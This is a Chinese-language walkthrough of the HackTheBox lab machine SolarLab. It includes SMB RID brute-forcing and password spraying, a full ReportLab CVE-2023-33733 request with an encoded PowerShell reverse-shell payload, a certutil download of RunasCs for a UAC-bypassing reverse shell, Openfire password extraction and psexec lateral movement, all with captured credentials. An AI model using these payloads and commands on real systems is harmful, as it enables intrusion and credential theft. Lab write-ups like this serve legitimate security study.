HTB-M-SolarLab

  1. 账户名的模糊猜测
  2. PeportLab的CVE复现
  3. Openfire脚本中提取账号密码

扫一扫

image-20250516163201023

试探smb

可以用来打RID

image-20250516181548194

1
netexec smb 10.10.11.16 -u guest -p '' --rid-brute

然后就是

image-20250516163742761

下载xlsx文件

image-20250516164504671

1
netexec smb solarlab.htb -u u.txt -p p.txt

image-20250516165142062

测试

image-20250516183152666

然后是分析

image-20250516190019644

image-20250516190040726

推理出账号

  • blakeb:ThisCanB3typedeasily1@

进去之后那个什么,离开请求,胡生成pdf,生成之后看看

image-20250516224441192

搜一搜PeportLab,有CVE-2023-33733

https://github.com/c53elyas/CVE-2023-33733/tree/master/code-injection-poc

之前信息搜集知道这是台Windows,然后就是,👇换个cookie和payload就行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
POST /travelApprovalForm HTTP/1.1

Host: report.solarlab.htb:6791

Content-Length: 2352

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://report.solarlab.htb:6791

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAV0OLYExkJA9aQBD

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: http://report.solarlab.htb:6791/travelApprovalForm

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.9

Cookie: session=.eJwlzjEOwzAIQNG7eO6AMWCSy0TYgNrVaaaqd2-krn_4ep9y5IrzWfb3uuJRjpeXvWDOHg2yq5s7NNbNqNuksF5RqhCYskSISAuoxA3gDjpy-KYcc7RqW-1pg6cPYk3MRoDzHtJIlB6oShpmJonMYSToiiKjZrkh1xnrr6nl-wPM4y-d.aCdMeQ.XCcCuIOlqBK0IEiT04vFotZ8Bx0

Connection: close



------WebKitFormBoundaryAV0OLYExkJA9aQBD

Content-Disposition: form-data; name="time_interval"



2024-05-18 to 2024-05-25

------WebKitFormBoundaryAV0OLYExkJA9aQBD

Content-Disposition: form-data; name="travel_request"



<font color="[[[getattr(pow, Word('__globals__'))['os'].system('cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAiACwANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font>

------WebKitFormBoundaryAV0OLYExkJA9aQBD

Content-Disposition: form-data; name="signature"; filename="nyan.png"

Content-Type: image/png



PNG

<--- CUT FOR BREVITY --->

------WebKitFormBoundaryAV0OLYExkJA9aQBD

Content-Disposition: form-data; name="user_input"



<p>asdf</p>

------WebKitFormBoundaryAV0OLYExkJA9aQBD--


获得shell1

信息收集

image-20250516231839683

image-20250516231956534

然后net user 没有发现这里的账户,但是

存在openfire

搜一搜

Openfire 是一个开源的 即时通讯(IM)服务器,基于 XMPP 协议(Extensible Messaging and Presence Protocol) 开发的。

默认端口9090,然后就是

模糊测试这个账户,把所有密码生成字典,然后做

1
netexec smb 10.10.11.16 -u 'openfire' -p p.txt
1
cmd.exe /c certutil.exe -urlcache -f -split http://10.10.16.5:80/RunasCs.exe C:\Users\blake\Downloads\runascs.exe

利用凭证弹出shell

1
C:\Users\blake\Downloads\runascs.exe openfire 'HotP!fireguard' cmd.exe -r 10.10.16.5:444 --bypass-uac -t 10

然后查ACL

1
2
3
4
5
cd Program Files

icacls Openfire
查看脚本文件
C:\Program Files\Openfire\embedded-db>type openfire.script

image-20250516234555028

利用需要俩内容,一个key,一个hex

用相同的方法解密

image-20250517075434033

psexec横移

1
rlwrap -cAr python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:'ThisPasswordShouldDo!@'@10.10.11.16 cmd.exe

参考